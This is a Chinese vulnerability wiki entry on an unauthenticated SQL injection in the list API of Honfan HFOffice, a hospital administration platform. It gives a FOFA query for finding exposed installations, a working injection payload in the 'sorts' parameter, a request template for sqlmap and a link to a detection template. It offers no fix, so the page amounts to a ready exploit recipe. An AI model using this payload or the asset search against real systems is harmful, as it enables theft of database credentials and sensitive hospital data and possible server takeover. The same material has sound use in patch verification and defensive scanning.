fofamini-wiki

登录白背景

源码

红帆HFOffice list存在SQL注入漏洞

一、漏洞简介

红帆HFOffice医微云是广州红帆科技有限公司研发的专注医疗行政办公管理，与企业微信全方位结合，提供协同办公、知识库、专家系统、BI等应用，进一步帮助医院移动办公落地，成就面向医院管理的“智慧管理”。平台list接口处存在SQL注入漏洞，未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及凭证，最终可能导致服务器失陷。

二、影响版本

红帆HFOffice

三、资产测绘

fofaapp="红帆-HFOffice"
特征

四、漏洞复现

/api/switch-value/list?sorts=[{"Field":"1-CONVERT(VARCHAR(32), HASHBYTES('MD5', '1'), 2);"}]&conditions=[]&_ZQA_ID=4dc296c6c69905a7

sqlmap

/api/switch-value/list?sorts=[{"Field":"2"}]&conditions=[]&_ZQA_ID=4dc296c6c69905a7

hfoffice-list-sqli.yaml

原文: https://www.yuque.com/xiaokp7/ocvun2/yahgyfa56nshqrg9

# 红帆HFOffice list存在SQL注入漏洞

# 一、漏洞简介
红帆HFOffice医微云是广州红帆科技有限公司研发的专注医疗行政办公管理，与企业微信全方位结合，提供协同办公、知识库、专家系统、BI等应用，进一步帮助医院移动办公落地，成就面向医院管理的“智慧管理”。平台list接口处存在SQL注入漏洞，未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及凭证，最终可能导致服务器失陷。

# 二、影响版本
+ 红帆HFOffice

# 三、资产测绘
+ fofa`app="红帆-HFOffice"`
+ 特征

![1710691197455-f50f8031-520c-4980-ab21-43455b700e56.png](./img/iGY0iMsrZglNoT-V/1710691197455-f50f8031-520c-4980-ab21-43455b700e56-200125.png)

# 四、漏洞复现
```plain
/api/switch-value/list?sorts=[{"Field":"1-CONVERT(VARCHAR(32), HASHBYTES('MD5', '1'), 2);"}]&conditions=[]&_ZQA_ID=4dc296c6c69905a7
```

![1710691226132-fb93f84d-3c18-42cc-ab2d-47a769d27e83.png](./img/iGY0iMsrZglNoT-V/1710691226132-fb93f84d-3c18-42cc-ab2d-47a769d27e83-415683.png)

sqlmap

```plain
/api/switch-value/list?sorts=[{"Field":"2"}]&conditions=[]&_ZQA_ID=4dc296c6c69905a7
```

![1710691734143-696edb28-3068-46b8-a1a7-09561de1066f.png](./img/iGY0iMsrZglNoT-V/1710691734143-696edb28-3068-46b8-a1a7-09561de1066f-859500.png)

[hfoffice-list-sqli.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/29512878/1723457217860-a5a55513-dbcd-46f6-8dd4-58a3b395b5d2.yaml)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/yahgyfa56nshqrg9>